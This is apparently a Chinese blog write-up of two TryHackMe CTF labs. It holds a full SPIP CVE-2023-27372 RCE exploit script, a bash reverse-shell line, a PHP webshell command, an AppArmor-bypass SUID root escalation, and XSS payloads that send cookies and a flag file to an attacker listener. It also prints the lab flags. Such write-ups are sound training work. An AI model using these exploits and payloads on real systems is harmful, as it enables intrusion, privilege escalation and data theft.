THM-Publisher&The Sticker Shop

本文最后更新于 2025年2月18日晚上

学到了学到了，一点不熟悉的提权。我好菜我好菜我好菜，靶机时间都过了重开了好几次，整理完（顺带水了个简单的）已经天亮了: (

Publisher

Description

The “Publisher“ CTF machine is a simulated environment hosting some services. Through a series of enumeration techniques, including directory fuzzing and version identification, a vulnerability is discovered, allowing for Remote Code Execution (RCE). Attempts to escalate privileges using a custom binary are hindered by restricted access to critical system files and directories, necessitating a deeper exploration into the system’s security profile to ultimately exploit a loophole that enables the execution of an unconfined bash shell and achieve privilege escalation.

信息收集

nmap

1	`nmap -sS -sV -Pn 10.10.42.106`

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开放了 22 和 80

80

访问 http 服务

扫目录扫到了很多 spip

搜了一下 SPIP ，是一个 CMS

Metasploit

用 msf 查找一下有没有什么漏洞

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# msfconsole -q
msf6 > search spip

Matching Modules
================

   #   Name                                             Disclosure Date  Rank       Check  Description
   -   ----                                             ---------------  ----       -----  -----------
   0   exploit/multi/http/spip_bigup_unauth_rce         2024-09-06       excellent  Yes    SPIP BigUp Plugin Unauthenticated RCE
   1     \_ target: PHP In-Memory                       .                .          .      .
   2     \_ target: Unix/Linux Command Shell            .                .          .      .
   3     \_ target: Windows Command Shell               .                .          .      .
   4   exploit/multi/http/spip_porte_plume_previsu_rce  2024-08-16       excellent  Yes    SPIP Unauthenticated RCE via porte_plume Plugin
   5     \_ target: PHP In-Memory                       .                .          .      .
   6     \_ target: Unix/Linux Command Shell            .                .          .      .
   7     \_ target: Windows Command Shell               .                .          .      .
   8   exploit/multi/http/spip_connect_exec             2012-07-04       excellent  Yes    SPIP connect Parameter PHP Injection
   9     \_ target: PHP In-Memory                       .                .          .      .
   10    \_ target: Unix/Linux Command Shell            .                .          .      .
   11    \_ target: Windows Command Shell               .                .          .      .
   12  exploit/multi/http/spip_rce_form                 2023-02-27       excellent  Yes    SPIP form PHP Injection
   13    \_ target: PHP In-Memory                       .                .          .      .
   14    \_ target: Unix/Linux Command Shell            .                .          .      .
   15    \_ target: Windows Command Shell               .                .          .      .


Interact with a module by name or index. For example info 15, use 15 or use exploit/multi/http/spip_rce_form
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'

结合题目描述来看可能是这个 rce

1	`12 exploit/multi/http/spip_rce_form 2023-02-27 excellent Yes SPIP form PHP Injection`

CVE-2023-27372

搜了一下，应该是打 CVE-2023-27372，创建一个 27372.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Exploit Title: SPIP < 4.2.1 - Remote Code Execution (Unauthenticated)
# Google Dork: inurl:"/spip.php?page=login"
# Date: 19/06/2023
# Exploit Author: nuts7
# Vendor Homepage: https://www.spip.net/
# Software Link: https://files.spip.net/spip/archives/
# Version: < 4.2.1 (Except few fixed versions indicated in the description)
# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0
# CVE reference : CVE-2023-27372 (coiffeur)
# CVSS : 9.8 (Critical)
#
# Vulnerability Description:
#
# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.
#
# Usage: python3 CVE-2023-27372.py http://example.com

import argparse
import bs4
import html
import requests

def parseArgs():
    parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")
    parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")
    parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")
    return parser.parse_args()

def get_anticsrf(url):
    r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)
    soup = bs4.BeautifulSoup(r.text, 'html.parser')
    csrf_input = soup.find('input', {'name': 'formulaire_action_args'})
    if csrf_input:
        csrf_value = csrf_input['value']
        if options.verbose:
            print("[+] Anti-CSRF token found : %s" % csrf_value)
        return csrf_value
    else:
        print("[-] Unable to find Anti-CSRF token")
        return -1

def send_payload(url, payload):
    data = {
        "page": "spip_pass",
        "formulaire_action": "oubli",
        "formulaire_action_args": csrf,
        "oubli": payload
    }
    r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)
    if options.verbose:
        print("[+] Execute this payload : %s" % payload)
    return 0

if __name__ == '__main__':
    options = parseArgs()

    csrf = get_anticsrf(url=options.url)
    send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))

随便写一个 webshell.php

1	`bash -i >& /dev/tcp/10.14.96.254/4444 0>&1`

然后

1	`python 27372.py -u http://10.10.42.106/spip -c 'echo "<?php system(\$_GET[\"cmd\"]); ?>" > webshell.php' -v`

成功执行

查看有哪些用户目录，有一个 think 用户

查看用户目录文件

访问/user.txt 拿到第一个 user flag

1	`fa229046d44eda6a3598c73ad96f4ca5`

SSH

发现有 .ssh，访问 /home/think/.ssh 拿到私钥

给 600 权限（最开始脑子抽了直接给的 777，后面才想起来它的权限最大才 600），用 ssh 登录

1	`ssh think@10.10.42.106 -i id_rsa`

查找系统中所有设置了 SUID 的可执行文件

think@publisher:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/sbin/run_container
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

看到了一个不是典型的 SUID 文件

1	`/usr/sbin/run_container`

查看文件发现有一句 bin/bash -p /opt/run_container.sh，说明这将执行 /opt/run_container.sh ，查看 run_container.sh 内容

#!/bin/bash

# Function to list Docker containers
list_containers() {
    if [ -z "$(docker ps -aq)" ]; then
        docker run -d --restart always -p 8000:8000 -v /home/think:/home/think 4b5aec41d6ef;
    fi
    echo "List of Docker containers:"
    docker ps -a --format "ID: {{.ID}} | Name: {{.Names}} | Status: {{.Status}}"
    echo ""
}

# Function to prompt user for container ID
prompt_container_id() {
    read -p "Enter the ID of the container or leave blank to create a new one: " container_id
    validate_container_id "$container_id"
}

# Function to display options and perform actions
select_action() {
    echo ""
    echo "OPTIONS:"
    local container_id="$1"
    PS3="Choose an action for a container: "
    options=("Start Container" "Stop Container" "Restart Container" "Create Container" "Quit")

    select opt in "${options[@]}"; do
        case $REPLY in
            1) docker start "$container_id"; break ;;
            2)  if [ $(docker ps -q | wc -l) -lt 2 ]; then
                    echo "No enough containers are currently running."
                    exit 1
                fi
                docker stop "$container_id"
                break ;;
            3) docker restart "$container_id"; break ;;
            4) echo "Creating a new container..."
               docker run -d --restart always -p 80:80 -v /home/think:/home/think spip-image:latest
               break ;;
            5) echo "Exiting..."; exit ;;
            *) echo "Invalid option. Please choose a valid option." ;;
        esac
    done
}

# Main script execution
list_containers
prompt_container_id  # Get the container ID from prompt_container_id function
select_action "$container_id"  # Pass the container ID to select_action function

必须绕过当前的 shell 限制，才能重写 run_container.sh。并且在 /opt 目录下不能列出文件，但是使用ls -al 显示的是能够读取目录的内容的

AppArmor

再回想一下题目描述，“necessitating a deeper exploration into the system’s security profile”，需要对系统的安全配置文件进行更深入的探索

Attempts to escalate privileges using a custom binary are hindered by restricted access to critical system files and directories, necessitating a deeper exploration into the system's security profile to ultimately exploit a loophole that enables the execution of an unconfined bash shell and achieve privilege escalation.

检查 ACL 和 SELinux 以及 AppArmor

（简单介绍一下 ACL ，SELinux，AppArmor：ACL 是访问控制表，是由很多条“deny|permit” 语句组成，每一条都是 rule，用于控制网络流量的进出。SELinux 是一个 Linux 内核模块，也是 Linux 的一个安全子系统，为了限制资源的访问。AppArmor 是与 SELinux 类似的一个访问控制系统，通过它可以指定程序的读写权限等等，其实我并不是很了解）

通过命令可以检测系统有无这些安全配置

1
2
3

getfacl /opt //检查 ACL
sestatus	//检查 SELinux
apparmor_status		//检查 AppArmor

“apparmor module is loaded ” 说明 AppArmor 已启用，AppArmor 策略位于 /etc/apparmor.d/ 下

提权

查看 /etc/apparmor.d/usr.sbin.ash 内容

think@publisher:~$ cat /etc/apparmor.d/usr.sbin.ash
#include <tunables/global>

/usr/sbin/ash flags=(complain) {
  #include <abstractions/base>
  #include <abstractions/bash>
  #include <abstractions/consoles>
  #include <abstractions/nameservice>
  #include <abstractions/user-tmp>

  # Remove specific file path rules
  # Deny access to certain directories
  deny /opt/ r,
  deny /opt/** w,
  deny /tmp/** w,
  deny /dev/shm w,
  deny /var/tmp w,
  deny /home/** w,
  /usr/bin/** mrix,
  /usr/sbin/** mrix,

  # Simplified rule for accessing /home directory
  owner /home/** rix,
}

仔细看看就会发现这个配置文件明显存在缺陷，/dev/shm 和 /dev/tmp 缺少了通配符，如果没有通配符，deny 规则仅仅会阻止更改具有这个名称的文件，但他的目录的内容不受影响，允许任意文件写入，所以我们可以写入 /dev/shm 和 /var/tmp

1 2	`deny /dev/shm w, deny /var/tmp w,`

之前访问 /etc/passwd 时会发现

1	`root:x:0:0:root:/root:/usr/bin/bash`

那么复制 /bin/bash 到 /var/tmp 并运行

cd /var/tmp
cp /bin/bash .
./bash
ls /opt

然后现在就可以访问 /opt 了

think@publisher:/var/tmp$ ls -al /opt
total 20
drwxr-xr-x  3 root root 4096 Jan 10  2024 .
drwxr-xr-x 18 root root 4096 Nov 14  2023 ..
drwx--x--x  4 root root 4096 Nov 14  2023 containerd
-rw-r--r--  1 root root  861 Dec  7  2023 dockerfile
-rwxrwxrwx  1 root root 1715 Jan 10  2024 run_container.sh

重写 run_container.sh

1
2
3

#!/bin/bash
cp /bin/bash /var/tmp/Bash
chmod +s /var/tmp/Bash

运行

1	`/usr/sbin/run_container`

现在就已经是 root 了

运行 Bash

得到 root flag

1	`3a4225cc9e85709adda6ef55d6a4f2ca`

其实还有一个方法 AppArmor Shebang Bypass 可以绕过 AppArmor

：）

The Sticker Shop

Description

Your local sticker shop has finally developed its own webpage. They do not have too much experience regarding web development, so they decided to develop and host everything on the same computer that they use for browsing the internet and looking at customer feedback. Smart move!

Can you read the flag at http://10.10.110.119:8080/flag.txt?

信息收集

nmap

1	`nmap -sS -sV -Pn 10.10.110.119`

开放了 8080 和 22 端口

8080

老样子，访问 8080 端口，一个商店网站

直接访问 flag.txt 会返回 401

1	`401 Unauthorized`

XSS

我们能看到有一个 Feedback页面，像 XSS，但是输入 payload 后没回显

尝试直接弹 cookie

1	`<script>fetch("http://10.14.96.245:1234/"+document.cookie);</script>`

nc 监听

Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.110.119:35480.
GET / HTTP/1.1
Host: 10.14.96.245:1234
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.105 Safari/537.36
Accept: */*
Origin: http://127.0.0.1:8080
Referer: http://127.0.0.1:8080/
Accept-Encoding: gzip, deflate

并没有什么有用的信息

直接向服务器读取信息反弹到本机上，payload

1	`<script>fetch('http://10.10.110.119:8080/flag.txt').then(response => {return response.text();}).then(data => {fetch("http://10.14.96.245:1234/"+data);})</script>`

返回信息

Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.110.119:43650.
GET /THM%7B83789a69074f636f64a38879cfcabe8b62305ee6%7D HTTP/1.1
Host: 10.14.96.245:1234
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/119.0.6045.105 Safari/537.36
Accept: */*
Origin: http://127.0.0.1:8080
Referer: http://127.0.0.1:8080/
Accept-Encoding: gzip, deflate

URLdecode 一下

1	`THM{83789a69074f636f64a38879cfcabe8b62305ee6}`

渗透 > 靶机 > THM

#THM 渗透

THM-Publisher&The Sticker Shop

http://example.com/2025/02/14/Shop/

作者

butt3rf1y

发布于

2025年2月14日

许可协议

HTB-Titanic 上一篇

Android小记下一篇